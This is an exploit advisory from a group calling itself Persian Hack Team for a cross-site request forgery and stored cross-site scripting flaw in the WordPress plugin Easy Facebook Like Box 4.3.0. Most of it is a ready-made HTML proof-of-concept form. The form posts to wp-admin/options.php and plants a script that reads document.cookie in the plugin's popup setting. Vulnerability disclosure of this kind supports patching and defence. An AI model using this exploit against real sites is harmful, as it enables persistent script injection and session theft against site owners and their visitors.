######################
# Exploit Title : WordPress Plugin Easy Facebook Like Box 4.3.0- Cross-Site Request Forgery / Persistent Cross-Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/plugins/easy-facebook-likebox/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 4.3.0
# Date: 2016/11/19
######################
#
# PoC:
# CSRF and stored XSS vulnerability in Wordpress plugin Easy Facebook Like Box 4.3.0
# The Code for CSRF.html is :
 
<form method="post" action="http://localhost/wp/wp-admin/options.php">
Like box pup up settings
</br>
<input type='hidden' name='option_page' value='efbl_settings_display_options' />
<input type="hidden" name="action" value="update" />
<input type="hidden" id="_wpnonce" name="_wpnonce" value="aa27b52873" />
<input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=easy-facebook-likebox&amp;tab=autopopup" />
</br>
Enable PopUp<input type="checkbox" id="efbl_enable_popup" name="efbl_settings_display_options[efbl_enable_popup]" value="1" checked />
</br>
PopUp content<textarea id="efbl_popup_shortcode" name="efbl_settings_display_options[efbl_popup_shortcode]" rows="5" cols="50" placeholder="">
For Testing D:<script>alert(document.cookie)</script></textarea><br />
</br>
<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes"  />
</form>   
 
#
######################
# Discovered by :  Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi &  Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################